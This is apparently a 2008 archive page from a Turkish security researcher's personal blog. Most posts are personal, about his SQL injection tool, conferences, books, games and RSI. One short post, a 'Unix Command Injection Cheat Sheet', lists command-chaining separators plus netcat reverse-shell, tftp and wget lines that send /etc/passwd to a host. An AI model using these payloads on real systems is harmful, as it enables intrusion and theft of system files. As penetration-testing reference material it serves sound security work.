Bir kaç gün önce BSQL Hacker' ı yayınladım. BSQL Hacker yaklaşık 4-5 sene önce yazmaya başladığım bir yazılım. Başladığımda basit bir kod parçasıydı, yaklaşık bir sene önce çeki düzen verip bir çok kısmını tekrar yazmaya ve global bir formata oturtmaya çalıştım. Şimdi ciddi bir yazılım olma yolunda.

Yazılımın çıkışı bu şekilde organik olunca geliştirme süreci biraz tuhaf bir hal alabiliyor. Benim için BSQL Hacker' ı geliştirmek The Cool Cam gibiydi. Yüzlerce bug varken ben yeni özellikler ekledim, çünkü bug temizlemek ciddi derecede sıkıcı bir işken yeni ve "cool" bir özellik eklemek çok daha eğlenceli. Her ne kadar yazılımı yayınlayıp, kaliteli bir şekilde dağıtmayı istesem de bu yazılım Afrika' daki aç çocukları doyurmayacağından eğlence kısmı benim esas dinamom oldu.

Yazılımda genelde temel sorunu çözmek yerine bug' ı çözdüm, bu rezil bir yöntem ama gel görki saatler değil dakikalar harcayarak süper bir şey değil ama çalışan bir şey çıkartabiliyorsunuz. Ama siz siz olun Never debug standing

* "Sadece bu aralar mı?" dedi biri?, ayıp, ayıp.
** Bu noktada Chuck Palahniuk - Choke' taki dibe vurma konseptini de irdelemek lazım.
*** Kendime blog postlarında en fazla "obscure referanslar" gönderen blogcu seçiyorum, eski yazıların bir kısmındaki göndermeleri ben bile anlayamıyorum!

XSS Shell and XSS Tunnel Video

Ferruh Mavituna — Cmt, 23 Ağu 2008 12:18:28 +0300

Infinity Exists released a new episode which shows how to setup and use XSS Shell and XSS Tunnel. It explains how to download, setup and attack with XSS Shell / Tunnel. If you want to learn how to use it, having problems or just want to take a look at it, watch episode 21 - XSS Tunnel.

I've released a simple 2 minutes video ages ago, you can download it as well. If you are interested in technical details read XSS Tunnelling whitepaper.

Sentenced to years of school

Ferruh Mavituna — Cum, 22 Ağu 2008 18:21:15 +0300

Gods must be crazy' nin harika girişinden bir parça :

The more he improved his surroundings to make life easier...
...the more complicated he made it.

Now his children are sentenced to years of school, to learn how to survive in this complex and hazardous habitat.

Tüm script' i şuradan görebilirsiniz. Filmi izlemediyseniz de tavsiye ederim, biraz eski ve bazı kısımları gerçekten tırt ama sırf ilk girişi izlemek bile yeterli.

Paylaşmak İçin Kaç Kişiye İhtiyaç Var

Ferruh Mavituna — Cum, 22 Ağu 2008 03:41:07 +0300

Hep aklımdaki bir sorudur, bir şeyi kaç kişi ile paylaşırsanız bu paylaşıma değmiş olur. Mesela twitter hesabınızı kimse takip etmiyorsa twitter' a mesaj göndermenin bir anlamı var mı?

RSS' inizi kaç kişi okursa ya da sitenize günde kaç kişi gelirse bu sitede yazmaya değer? Yoksa bu paylaştığınız kişi sayısı ile kişisel tatmin bir birinden bağımsız olarak mı çalışıyor? Bir kaç seferinde teknik sorunlardan dolayı yazdığım yazıları kaybettim. Onları bir daha oturup yazmamıştım çünkü benim için esas olan yazmaktı, dolayısıyla kişisel tatmin tamamlanmıştı ama bazen yazıyorsunuz çünkü gerçekten paylaşmak istiyorsunuz.

Aynı konu rapidshare' da dosya paylaşmak ya da youtube' da video yayınlamak için de geçerli. Bir youtube videosunu hazırlamak upload etmek için 3 saat harcadıysanız ve onu sadece 170 kişi izlediyse, bir daha bu tip bir şey yaparmıydınız? Soruyu devam ettirebiliriz yazdığınız bir kitabı kaç kişi okursa bu kitabı yazmış olmaya değer?

Mesela bu nedenden dolayı bazı teknik yazıları Türkçe hiç yayınlamıyorum çünkü harcadığım vakte değmiyor. Konu çok teknik ve spesifik olunca zaten çok az kişinin ilgisini çekiyor, bu az kişinin %75 i ingilizce biliyor oluyor dolayısıyla bir yazıyı sadece 10 kişi için Türkçeye çevirmiş oluyorsunuz, bu da harcadığınız vakte genelde değmiyor.

Sansür Muhabbetleri

Ferruh Mavituna — Cum, 22 Ağu 2008 01:31:22 +0300

Bu konudan daha önce temel şekilde bahsetmiştim ama dayanamayıp tekrar yazacağım.

Eğer gerçek dünyadaki bir suç dijital ortamda işlendiyse bu suçu değiştirmez. Eğer birisini dolandırırsanız dolandırıcılıktan yargılanırsınız, eğer internet üzerinden dolandırırsanız nitelikli dolandırıcılıktan yargılanırsınız, ama suç değişmez.

Herkes yırtınıyor internette sansür olmasın diye, tamam olmasın ama Türkiye' de sansür var. Kanun bu. Eğer bir şeylere yırtınacaksak sansür olmasın diye yırtınmamız gerekiyor. Düşünce özgürlüğünün olmadığı (bir çok konuda) bir ülkede İnternette düşünce özgürlüğünün olması için dayanağınız nedir çok merak ediyorum.

Düşünce "memleketti kurtaramadık bari kendi oyun alanımız olan interneti kurtaralım" mıdır? Yoksa kanunun "televizyonda, radyoda, kitapta vs. sansüre devam ama internette sansür falan yok, herşey serbesttir" olarak değişmesini umuyoruz?

Not: Şu anki başbakanının düşünce suçundan zamanında hapise girdiği, halk tarafından seçilen partilerin her an kapatılma korkusu ile yaşadığı ya da kapatıldığı, kuruluşundan beri çeşitli nedenlerle insanların asıldığı, kaybolduğu bir memlekette youtube kapanınca herkesin fikir serbestliğinden, özgürlükten dem vurmaya başlaması da biraz komik. Hani hepsi tamamdı da bu son damla bardağı taşırdı kıvamında. Neyse gene dünyevi konulara girdim, söz bir sonraki yazı teknik olacak.

BSQL Hacker and Deep Blind SQL Injections

Ferruh Mavituna — Sal, 19 Ağu 2008 16:40:25 +0300

Finally I released BSQL Hacker and Deep Blind SQL Injection whitepaper.

Berat Kandiliniz Mübarek Olsun

Ferruh Mavituna — Cmt, 16 Ağu 2008 20:35:03 +0300

Allah, kendisine şirk koşulmasının dışındaki istediği kimselerin bütün günahlarını bağışlar. (Nisa Suresi, 48;116)

Helal dairesi geniştir, keyfe kâfi gelir (Sözler)

Tevbe etmek için güzel bir gece,
Berat Kandili hakkında daha fazla bilgi ve verimli şekilde değerlendirmek üzerine güzel bir yazı sorularla islamiyet' te var.

BSQL Hacker Videosu

Ferruh Mavituna — Cmt, 16 Ağu 2008 12:38:55 +0300

Başka projelerden dolayı BSQL Hacker ile pek ilgilenemedim ama inşallah önümüzdeki hafta içi ilk public betasını yayınlayacağım. "Niye hala beta?" diyebilirsiniz, sonuçta bu kodu yaklaşık 4,5 sene önce yazmaya başladım! Ama bir çok yenilik eklendi, çok geniş bir yapıya sahip. Ek olarak son versiyonda güçlü bir API desteği de var.

Aşağıdaki video SQL Injection Wizard' ını gösteriyor. Videoyu direk Vimeodan izlerseniz HD izleme şansınız olacak, o şekilde çok daha net.

BSQL Hacker Beta - Wizard Demo.

Şu an yaptığım iş yeni özellik eklmekten çok bugları temizleme ve tüm özelliklerin beklenildiği gibi çalıştığından emin olmaya çalışmak. Kodun çok eski olması, 8000+ satır olması ve tamamen hack & slash yazılım geliştirme yaptığımdan dolayı çok ciddi stabilite sorunları var. Buna rağmen şu an bulabileceğiniz en iyi SQL Injection araçlarından biri olduğunu düşünüyorum. Yani bir çok diğer aracın yapamadığı şeyleri yapabiliyor. Adam gibi yayınlayınca o konuların detaylarına ineceğim.

BSQL Hacker açık kaynak kodlu bir yazılım ve kodu Google Code üzerinden yayınlanacak.

Kitaplar, Yalanlar, Wired ve Web Application Hackers Handbook

Ferruh Mavituna — Per, 14 Ağu 2008 16:00:14 +0300

Siteyi takip edenlerdenseniz yakın dönemde Web Application Hackers Handbook ve Pragmatic Programmer kitaplarını bitirdiğimi biliyor olabilirsiniz.

Pragmatic Programmer çok uzun zamandır okumak istediğim bir kitaptı ve neredeyse bir başyapıt. Code Complete' tan sonra yazılım geliştirme konusundaki en iyi kitaptır. Eğer yazılım geliştirme ile ilgiliyseniz kesinlikle ve kesinlikle bu kitabı okuyun. Kitabın genel olarak üslubu da çok keyifli. Daha önceden kitaptan aldığım bazı notları yayınlamıştım.

Web Application Hackers Handbook daha çok bir referans kitabı. Eğer web uygulaması güvenliği konusunda zaten çalışıyorsanız yeni bir şey bulamayacaksınız. Bu arada kitapta benim geliştirdiğim XSS Shell' den de bahsediliyor ama yazarların bir hatası sonucu XSS Shell' in SecuriTeam tarafından geliştirildiği iddia edilmiş. İnanmayın bu tip şeylere! Bir sonraki baskı olursa düzeltilecekmiş. Özetle kitap güzel ama ben içerisinde benim ilgimi çekecek bir şey bulamadım.

Normal şartlarda pek dergi okumam, en azından son 8 senedir dergi okumuyorum ama bir dergi istisna. Sanırım herkes Wired' ı biliyordur. Geek' ler için televole dergisi. Nadiren de Edge Magazine' i okuyorum, klasik bir oyun dergisi ile oyun kültürü ve sektörü arasında gidip geliyor.

Bu ay Wired' ı da bitirdikten sonra yeni bir kitaba başlamam gerekti ve arşivime tekrar bakıp heyecanla okumayı beklediğim kitaplardan biri olan Secret and Lies' a başladım. Schneier (şınayr diye okunuyor) inanılmaz bir karakter, harika bir yazar ve süper bir teknik beyne sahip. Ek olarak iyi bir iş adamı. Dolayısıyla onun yazılarını okumak farklı bir deneyim.

Kitabın başında 5 sayfada dünyadaki tüm güvenlik sorununu ciddi ciddi çözdü. Gerçekten de dedikleri yapıldığında -ki çok uçuk şeyler değil-, güvenlik sektörünün en büyük sorunları kısa sürede çözülmüş olacaktır. Dolayısıyla henüz kitabın başında olmama rağmen kitap beni şimdiden etkiledi. Kitap hakkında tekrar yazacağım inşallah ama kitabı dijital formatta okumadığımdan dolayı pek not yayınlayamayacağım.

Takipte Kalın

Arada benden kitap önerisi isteyenler çıkıyor, Library Thing' te benim kitaplığımı görebilirsiniz. Okuduğum tüm kitaplar orada yok ama bir çoğu orada. Merak edenler oradan beğendiğim ve okuduğum kitapları görebilirler.

Son olarak benim blog yazmamam bir şey paylaşmadığım anlamına gelmiyor. Okuduklarım sayfasından ya da bu RSS ile benim payşlaştığım yazıları takip edebilirsiniz. Burada gevezelik ettiğim twitter' ım ve şurada da hepsi birlikte Profilactic - fm sayfası var. Memleketimde herkes FriendFeed kullanıyormuş, ben ona henüz bulaşamadım. Şimdilik bu şekilde idare edin artık.

RIATalks' un Ardından

Ferruh Mavituna — Sal, 12 Ağu 2008 10:04:44 +0300

Cuma ve Cumartesi RIATalk's taydım ve iki konuda konuştum.

Insecure Trends in Web 2.0 / Web 2.0 Uygulamalarında Güvenlik Sorunları
Flash Uygulamalarında Güvenlik

Etkinlik Bahçeşehir üniversitesi Beşiktaş kampüsündeydi. Okunacak değil de daha çok tatil yapılacak bir yer tadında harika bir manzarası vardı. Özellikle benim gibi uzun süredir denizden uzak kalan biri için boğaz manzarasında kola yudumlamak büyük bir keyifti.

Birinci sunum olan "Web 2.0 Uygulamalarında Güvenlik Sorunları", "Kurumsal" sunumların yapıldığı daha küçük olan salondaydı ve çok daha keyifli geçti, katılımcılar hem sunum sırasında hem de sunumun sonundaki fikir paylaşımı kısmında tam bir harikaydı. Buradan teşekkür ederim kendilerine de.

İkinci sunum ise "Flash Uygulamalarında Güvenlik" ti. Sunumun içeriği gereği çok fazla teknik bilgi vardı ek olarak güvenlik ile ilgili bilgiye de ihtiyaç vardı, dolayısıyla kendimi CSRF, XSS nedir' i anlatırkem buldum ki bu da tüm sunumu teknik olarak iyice karışık yaptı. Buna rağmen fena geçmedi ama bir daha katılımcıların %80' inin rahatça takip edebileceğine inanmadıktan sonra bu kadar teknik sunum seçmemeye karar verdim. İkinci sorun salon o kadar büyüktü ki sahnede de değilde televizyonda sunum yapıyormuş gibi hissettim. Buna rağmen bir çok kişi iki sunumun da çok güzel olduğunu söyledi, her ne kadar ben ikinci sunumda tuhaf hissetsem de o aslında iyi geçmiş.

Bunun harici bir çok eski arkadaşımı gördüm, yeni süper insanlar ile tanıştım, bir de konferans sonu arkadaki cafe' de gizli bir güvenlik toplantısı da yaptık. Dolayısıyla arada sosyalleşme şansı da buldum. Türkiye' nin internet camiasının yakınlığını acayip seviyorum, sanki herkes birbirini liseden beri tanıyormuş gibi.

İki sunumun da hem slaytları hem de videosu online olacak. Insecure Trends in Web 2.0 zaten ingilizce olarak üzerinde çalıştığım bir makalenin türkçe sunumuydu, dolayısıyla çok daha detaylı bir makale o konuda gelecek inşallah.

Aşağıda RIATalks hakkında konuşan blogların adreslerini veriyorum. Sunum ve videoları bekleyemeyenler için bazı yazılarda benim sunumlarımın teknik detayları da var.

Selçuk Hoca - RIATalks İstanbul İzlenimleri - I
Selçuk Hoca - RIATalks İstanbul İzlenimleri - II
Ahmet Eyüp - RIATalks İzlenimleri
Riatalks, Snooker and Joker (ingilizce)
Arman Acar - RiaTalks Ardından
Bonus olarak şu twitter mesajı :)

Fotoğraf için Arman Acar' a http://www.flickr.com/photos/el3ctro/2748829625/ ya teşekkürler.

Blackhat 2008 ve Defcon 2008 Sunumlarının Rapidshare Downloadları

Ferruh Mavituna — Pzt, 11 Ağu 2008 08:36:53 +0300

Eve yeni dönmüş biri olarak Defcon 2008 ve Blackhat 2008' i yakalamaya çalışıyorum. Bu sırada bir kaç kaynaktan sunumları indirdim, basitçe rapidshare' a upload ettim ki hızlı şekilde download edilebilecek bir yer olsun.

Blackhat 2008 Sunumları - http://rapidshare.com/files/136401343/bh2008-2.zip
Defcon 2008 Sunumları - http://rapidshare.com/files/136387502/defcon2008.zip

Bu arada şimdilik şu sunumları sevdim:

Get Rich or Die Trying - BH_US_08_Grossman_Evans_Get_Rich_or_Die_Trying.pdf
Anatomy of a Subway Hack - defcon-16-anderson-ryan-cheisa-2.pdf

Yeni güzel sunumları denk geldikçe listeyi de güncelleyeceğim. Bazı sunumlar demo olmadan bir anlam ifade etmiyor onlar için videoları bekliyor olacağız.

RIATalks' ta Buluşalım

Ferruh Mavituna — Pzt, 04 Ağu 2008 20:20:27 +0300

8-9 Ağustos' da (yani bu cuma ve cumartesi) İstanbul' daki Zengin İnternet Uygulamaları (RIA) ve Web 2.0 Konferansı' ında konuşuyor olacağım. Uzun süredir İstanbula gelememiştim, güzel olacak inşallah. Ek olarak daha bir sürü güzel konuşma var konferansta (bu cümleden benim konuşmamın da güzel olduğu gerçeğini çıkartabilirsiniz!) Konferans ücretsiz ama kayıt yaptırmanız gerekli, zaten az vakit kaldığından dolayı acele edin.

Ben hem cuma hem de cumartesi konuşuyor olacağım, teknik ve kurumsal. İkisi için de güzel sunumlar sizi bekliyor olacak.

RIATalks' ta görüşmek üzere,

ASP.NET - Otomatik Kod vs.

Ferruh Mavituna — Pzt, 04 Ağu 2008 20:06:29 +0300

RSI hikayesinden dolayı bir şey yapamadığımdan vaktimi kitap okuyarak ve Warhammer 40000, Squad Command oynayarak geçiriyorum. Şimdi pragmatic programmer' da şu kısım ilgimi çekti :

... But using a wizard designed by a guru does not automatically make Joe developer equally expert. Joe can feel pretty good—he's just produced a mass of code and a pretty spiffy-looking program. He just adds in the specific application functionality and it's ready to ship. But unless Joe actually understands the code that has been produced on his behalf, he's fooling himself. He's programming by coincidence. Wizards are a one-way street—they cut the code for you, and then move on. If the code they produce isn't quite right, or if circumstances change and you need to adapt the code, you're on your own.

Genelde MS' in ASP.NET tasarım yaklaşımını ve benzeri yaklaşımları bu yüzden sevmiyorum, direk olarak sizin kontrolünüzde olmayan bir dizi olay sonucunda programlama yapıyorsunuz. Bu kötüdür demiyorum, anladıktan sonra bir sorun da yok ama özellikle yeni başlayan programcıların, bunları kullanıp daha sonradan kendi programlarındaki bir hatayı tespit edememeleri biraz komik oluyor.

My Love is Killing Me

Ferruh Mavituna — Cum, 01 Ağu 2008 23:48:03 +0300

Bir süredir çok fazla yazamıyorum, ana nedeni RSI' mın azmış olması. RSI klasik bilgisayarcı hastalıklarından biri. Özetle mouse ve klavye ile aynı hareketleri tekrarlamaktan dolayı şaftının kaymasına deniyor. Bendeki RSI Carpal Tunnel Sendromu değil ama benzer bir şey. Temel olarak klavye ve mouse, bileğimde ve kolumda ciddi ağrılara neden oluyor. Bu başıma üçüncü defa geliyor, o yüzden artık biraz daha dikkat etmeye çalışıyorum, buraya daha az yazmamın nedenlerinden biri bu, bunun anlamı daha az e-mail cevabı demek aynı zamanda. Bir süreliğine elimi ve kolumu dinlendirmeye çalışıyorum.

İkinci trajik durumsa ilerlemeden ya da başlamadan gözlerimi de kontrol ettirmeye başlıyorum. Bilgisayarın başımıza açtığı işler, ya da ofisteki arkadaşların tabiri ile "yaşlanıyorum". Tabii bunu söyleyen arkadaş bir kaç ay önce 30' una girdi onun acısını benden çıkarmaya çalışıyor! Cumartesi göz check-up' ım var bakalım gözlükle mi, lensle mi ya da temiz mi döneceğiz.

RSI' a geri dönersek, benim analizlerime göre yapabileceğiniz şeyler:

Wrist Brace - Bileklik Edinin
Bu inanılmaz derecede benim işime yaradı, o olmasaydı şu an bunu yazamazdım. Ben yandaki bilekliği kullanıyorum, Her ne kadar hafiten bir "Micheal Jackson" imajı yapsa da çok kullanışlı.
Daha çok kısayol kullanın. Çok kullandığınız programların özellikle tarayıcınızın ve işletim sisteminizin kullandığınız tüm fonksiyonlarının kısayollarını bilin.
Çalışmaya ara verin, her 30 dk. da bir 1-2 dk. kadar yeterli olacaktır. Bunu RSI Reminder gibi küçük programcıklar ile yapabilirsiniz.
Powerball edinin, Bunu bir kaç kişi önerdi. Bende bir tane sipariş ettim, yolda. Farklı kasları çalıştırmanızı sağlıyormuş, hem de eğlenceli bir zımbırtıymış. Bir nevi yeni neslin yoyosu.
Ergonomik klavye kullanın, iki el ile yazmayı öğrenin.
Ergonomik şekilde oturun ve monitor, klavye, mouse u ona göre ayarlayın.
Mouse yerine Joistik, Trackball, Trackpad, Foot pedal ya da benzer bir şey kullanmaya başlayın. Yukarıdaki resimdeki Logitech Trackman güzel bir seçim olabilir.
Güzel bir sandalye alın
CRT monitör kullanıyorsanız hemen onu çöpe atıp bir TFT edinin, tasarımcıyım CRT den ayrılmam gibi bir şey gevelemeyin, tasarımcısınız diye kör olmanız gerekmiyor. 17" ile 1440*900 çözünürlük yerine 19" da 1440*900 çözünürlük kullanın.
Mouse ile oynanan oyunları oynamayın, eğer mümkünse kendinize bir XBox 360 ya da PS3 edinin, ya da PC oyunlarını Gamepad ile oynayın bu sayede farklı kasları kullanabilirsiniz.

Özetle bilgisayar aşkınızın sizi öldürmesine izin vermeyin. Kolum tekrar ağrımaya başladı o yüzden burada bırakıyorum...

Başlıktaki göndermeyi anlamayanlar için, bu Six String Samurai filminin Red Elvises' ın söylediği harika bir şarkı.

RPG Oyunları

Ferruh Mavituna — Sal, 22 Tem 2008 09:31:17 +0300

Bilindiği üzere ben RPG oyunlarının büyük bir fanıyım. Bir kaç hafta önce RPG oyunlarının tarihi hakkında uzun bir yazı dizisi okuma fırsatı buldum. The History of Computer Role-Playing Games. Ek olarak birde kitap var daha detaylı şekilde Dungeons and Desktops, henüz okuma fırsatım olmadı.

Tüm yazı serisi 50 sayfa kadar ve ilk RPG türevlerinden bugüne kadar geliyor. Herşeyden önce gelişim çok etkileyici ve ilginç, onlarca seneden sonra bazı oyunların hala çok eski oyunlardaki detayları yakalayamamış olması gibi. Orijinal bir oyun türünün gelişimini sayfalardan izlemek gayet etkileyici. Yazar belli ki konusunda uzman ve 1994-2004 arasını CRPG' nin en önemli yılları olarak belirtmiş.

Bu tarihlerde benim de severek oynadım şu oyunlardan ve bu oyunlarında devam serilerinden bahsediyor:

Fallout
Baldur's Gate
Temple Of Elemental Evil
Icewind Dale
Diablo

Diğer ilginç bir nokta ise Diablo' nun ve benzer Hack'n Slash oyunlarının hem CRPG' yi çok büyük kitlelere tanıştırdığını hem de aynı zamanda CRPG için kötü olduğunu çünkü bundan sonraki Temple of Elemental Evil gibi oyunların artık oyunculara çok karışık geldiğinden bahsediyor. Yukarıdaki oyunların hepsi genel alt yapıda gerçek masaüstü RPG oyunlarından implemente edilmiş kurallar ile çalışıyorlar. Fallout ve Diablo hariç hepsi D&D kurallarına uygun şekilde. Fallout' un kendi özel sistemi var ve bu başka masaüstü oyunlarda da kullnılıyor. Diablo' nun kendi içerisinde daha basit bir sistemi var. Dolayısıyla oyunlar genelde tuş parçalamaktansa stratejiye yönelik. Zaten aynı zamanda bir çoğu turn-based yani gerçek zamanlı değil.

İlginç, neredeyse son dört senedir adam gibi RPG yapılmış değil, Oblivion gibi RPG' leri saymıyorum, saymamamın tek nedeni benim First-Person-View RPG' leri sevmemem. Gene aynı konuya gireceğim ama tabii ki konsolların piyasayı doldurması PC oyunlarına ayrılan bütçeyide çok kısıtladı. Artık eski-stil, izometrik görüntü RPG' ler para etmiyor gibi ve sadece kısıtlı PC kullanan ve hard-core RPG severlere hitap ediyor. Bu gruptaki oyuncu sayısı da azaldıkça, yeni oyunlar çıkmaz oluyor.

Eski oyunların tekrar yapımları

Bu aralar kafamda olan şey bu, bir çok harika RPG oyunu yapıldı ama yeni oyuncular bunları tamamen kaçırmış durumda, bu oyunların bire bir aynıları yeni ufak geliştirmeler ile ve tamamen yeni oyun motoru, grafikler ile geliştirilseler süper olmaz mı? Mesela Bionic Commando bu şekilde tekrar yapılıyor. Baldur's Gate serisi, Fallout Serisi, Planescape: Torment vs.

PS3 güzel gözüken ama rezil oyunlar ile dolu, yeni konsol oyunlarının %70' nin böyle olduğunu söyleyebilirim (benim oyun zevkime göre). Özetle keşke büyük firmalara eski ve güzel oyunları tekrar yapmaya başlasalar süper olurdu ama bu tekrar yapmak olayının popüler olması şimdilik zor gibi.

Reklam İndeksi ve Reklam Ödülleri

Ferruh Mavituna — Paz, 20 Tem 2008 12:27:58 +0300

Herşeyden önce siteye reklam verenlerin hepsine çok teşekkürler. Sevindiğim konulardan biri genelde tüm reklamların okuyucu kitlesi ile tam olarak uyuşması dolayısıyla adsense' teki gibi alakasız reklamlarlardansa mantıklı güzel reklamlar oluyor sitede.

Şimdiye kadarki reklam verenlerin bir listesini yazmak istedim.

Flash Page Flip
En uzun reklam veren ödülünü kazandı.
Zemana AntiLogger
Sitenin içeriği ile en iyi uyuşan reklam ödülünü kazandı.
CvZip
Google Ad Manager' ı bu sitede kullanan ilk reklam veren ödülünü kazandı.
Lafmacun
En ufak reklam ödülünü kazandı.
Azbuz
En büyük yer kaplayan reklam ödülünü kazandı.

Reklam verenlere tekrar teşekkürler.

Bu arada google reklamlarımız küçüldü ve yazıları engellemeyecek şekilde sağ kısma kaydı. Umarım artık yazılar reklamlarla içe girmez. Yeni tasarım biraz gecikme de, sanırım en az 1-2 ay daha sürecek onu açabilmem.

Unix Command Injection Cheat Sheet

Ferruh Mavituna — Paz, 20 Tem 2008 12:10:31 +0300

Short, yet quite useful command injection cheat sheet.

Executing Commands

Seperating Commands:
blah;blah2
PIPE:
blah | blah2
PIPEZ:
blah ^ blah2
AND:
blah && blah2
OR:
FAIL || X
OR:
blah%0Dblah2%0Dblah3
Backtick:
`blah`
Background:
`blah & blah2`

Getting Files / Data

FTP:
Make a new text, and echo and then redirect to FTP
NC:
nc -e /bin/sh
NC:
echo /etc/passwd | nc host port
TFTP:
echo put /etc/passwd | tftp host
WGET:
wget --post-file /etc/passwd

Credits : notsosecure and pentestmonkey

Firefox 3 ve Debian ve XUL

Ferruh Mavituna — Per, 17 Tem 2008 20:05:47 +0300

Son iki üç gündür yorumları pek hızlı onaylıyamıyordum, çünkü sistmelerimden birimi Vista' dan Debian' a geçirmek ile meşguldüm. Nihayet bugün işlemlerimi bitirdim ve Debian' ım Firefox 3 ve Thunderbird ile birlikte çalışır hale geldi.

Debian kullanıcıları bilir Debian lisans konusunda çok takıntılı bir dağıtım, o yüzden bazı paketleri kullanmak için biraz kasmanız ya da ekstra repository' ler kullanmanız gerekiyor. Aynı nedenden dolayı Firefox değil forku olan iceweasel ile geliyor.

Firefox 3' ü kullanabilmeniz için basitçe son Linux binary release' i indirin, güzel bir yere açın. Ondan sonra da flash' ın çalışması için de iceweasel' ın plugins klasöründeki .so dosyalarını Firefox 3' ün plugins' ine atın tamamdır. 64bit Linux ve Flash derdi ise bambaşka bir konu, ben bu dertlerden kaçmak için 32bit yaşıyorum hala.

Esas söylemek istediğim ise Thunderbird ve Firefox' un farklı platformlarda çalışmalarının inanılmaz güzelliğiydi. Şu an kullandığım Firefox profili aşağıdaki yollardan geçmiş bir profil :

Windows 2003 > Max OSX > Windows Vista > Debian

Ve hepsinde de süper bir şekilde çalışıyor. Thunderbird profilimi de aynı şekilde tutuyorum, inanılmaz bir güzellik. Keşke aynı kalitede ve aynı şekilde farklı platformlarda çalışabilen daha çok yazılıma sahip olabilsek.

Vaktim olunca bir de KDE 4' ü denemek istiyorum ama bakalım...

MySpace' i Sen Yapsaydın?

Ferruh Mavituna — Çar, 16 Tem 2008 09:39:55 +0300

Geçen gün ofiste bu soru ortaya çıktı:

MySpace' i sen yapsaydın bundan gurur duyar mıydın?

Soruyu aynen size iletiyorum, ofiste üç kişiden üç farklı yaklaşım oldu. Bakalım site ahalisi ne düşünüyor.

Fallout 3

Ferruh Mavituna — Sal, 15 Tem 2008 00:43:36 +0300

Geldi gelecek, işte ilk görüntüler geldi. Açıkçası ben genel olarak Fallout 3 konusunda bir hayal kırıklığı yaşıyorum ama bunu sonra vaktim olunca yazarım. Hatta o konuyu yazarken hatırlatın bir de Diablo III den bahsedeyim.

Unutmadan videolarda kan-gövde götürmekte, +16 diyebiliriz sanırım.

Videolar :

Takıntı...

Ferruh Mavituna — Paz, 13 Tem 2008 01:26:29 +0300

Neden başladığımı hatırlamıyorum ama artık bırakmak mümkün değil...

Penetration Tester Olmak

Ferruh Mavituna — Cmt, 28 Haz 2008 10:59:36 +0300

Daha önceden pek çok kişi zaten söyledi güvenlikçi olmak sadece birkaç teknik konuyu iyi bilmek ya da birkaç kitap okumak değil daha çok beynin nasıl çalıştığı, bir soruna nasıl yaklaşıldığı ve olaylara bakış açısı ile ilgili. Bunun yanında bir çok başka meslekte de gerektiği gibi gündemi takip etme, odaklanma ve havadaki kokuları alabilme de gerekli meziyetlerden.

Bir güvenlik uzmanının ya da daha spesifik olarak penetration tester’ ın bir dizi özelliğe ihtiyacı var. Bu özelliklerin bir kısmı teknik, ve teknik şeyler öğrenilebilir ama bir kısmı da doğuştan gelen huylar ve muhtemelen ne yaparsanız yapın öğrenemeyeceğiniz ya da gerçekten öğrenmesi seneler sürecek şeyler.

Konuyu burada hemen “güvenlikçi oılunmaz, güvenlikçi doğulur(!)” a bağlamak istemiyorum, çünkü durum bu değil. İddialara göre Mehmet Akif Ersoy demiş ki “Şiirin %5 ilham, %95 çalışmaktır”. Ben de bu şekilde düşünüyorum, dolayısıyla %5 + %95 e erişince Mehmet Akif Ersoy olunuyor.

Yazacaklarımın bazıları gerçekten ölümcül bazıları ise sadece işinizde daha iyi olmanızı sağlayacak şeyler.

Güvenlikçi Olarak Yaşamak, Güvenlikçi Olarak Düşünmek
- Yapmak değil, yıkmak
- Kullanmak değil, Suistimal etmek
Derinlemesine Bilgi
Paranoya
Tutku
İletişim Becerisi
Okuma

Penetration Testing, Güvenlik Uzmanı ve Vulnerability Assessment

Yazının detaylarına geçmeden önce bazı terimleri temiz şekilde ifade etmek gerekir.

Penetration Testing (Pen Test)
Bir sistemi dışarıdan genelde ekstra hiçbir ekstra bilgi sahibi olmadan güvenlik açıklarına karşı test etmek ve bu açıkları mümkün olduğu kadar exploit etmek.

Vulnerability Assessment (VA)

Aynı penetration testing gibidir ama açıklar exploit edilmez, burada dikkat edilmesi gereken bir nokta var ki Vulnerability Assessment daha çok false positive verecektir ve açığın gerçek etkisini ortaya koymayabilir.

Mesela test edilen sistemdeki Buffer Overflow açığı olan bir SMTP server varsa ama karşıdaki sistem x64 ise ve bu açık x64 da geçerli değilse Vulnerability Assessment bunu açık olarak direk kabul edecektir ama gerçekte bu açık exploit edilemeyeceğinden direk bir risk taşımamaktır. Buna rağmen eski versiyon bir yazılım bulundurmak genelde iyi bir fikir olmadığından VA’ ın sonuçları her şekilde işe yarayacaktır.

Güvenlikçi / Güvenlik Uzmanı

Güvenlik Uzmanı çok geniş bir terim genelde şu iki anlamda kullanılır:

Bir sistemin güvenliğini sağlamadan sorumlu kişi.
Güvenlik işini bilen kişi.

İroniktir ki genelde güvenlikçikler sistemleri korurlar Penetration Testerlar gibi saldırmazlar ama bu grubun ikisi de Güvenlikçi, Güvenlik Mühendisi, Güvenlik Uzmanı diye geçebilir.

Ek olarak bazı güvenlikçiler kendi sistemlerini test etmek için kendi içlerinden kendi sistemlerine saldırganmış gibi de test edebilirler. Bu kişiler genelde iki rolüde üstlenmiş olurlar. Not düşmek lazım bu aynı kendi programınızda “bug” aramak gibidir, yani muhtemelen iyi sonuçlar vermeyecektir. Yazılımın sahibi olarak yazılımın zaten doğru oldu varsayımı ile yola çıktığınızdan genelde önünüzdeki sorunları bile göremeyeceksinizdir.

Güvenlikçi Olarak Düşünmek

Polisiye filmlerdeki klasik muhabbetlerden biri “profiling” dir yani saldırganın profilini çıkartabilmek. Buradaki en büyük klişe ise bir dedektifin saldırgan gibi düşünmesidir. Ne kadar klişe olsa da bu gerçekten saldırgana ulaşmanın en iyi yoludur ve güvenlikçi de aynı periyoddan çok daha güçlü şekilde geçer.

Çünkü bir polis gerçekte saldırgana ulaşmak için kimseyi öldürmez ama güvenlikçi siteye girer, exploit eder, database’ i indirir, reverse shell’ ine erişir. Gerçekten suçu işler, doruğa çıkar ve iner. Bu gereksinim güvenlikçinin içerisinde saldırgan kimliğinin bire bir yaşamasını sağlar.

Bilinen bir gerçek bir çok büyük güvenlik firmasında çalışan kişilerin eski suçlu hackerlar olduğudur.

Örnek isterseniz Kevin Mitnick’ in kendisi ya da eski @stake’ in L0pth Heavy Industries hacker grubunda gelen tayfası güzel bir örnek olacaktır. Bu örneklerin yanında diğer bir çok benzer güvenlik sektöründe çalışan kişinin de karanlık bir mazisi vardır. Bu arada not düşmek gerekir ki bu furya değişiyor, yazının ilerisinde ona değineceğim.

O zaman güvenlikçi saldırgan gibi düşünmelidir, Saldırganın motivasyonu nedir?

Para,
Karşıdaki sistemi kırıp elde edeceği getiri (Kredi Kartı vs.)
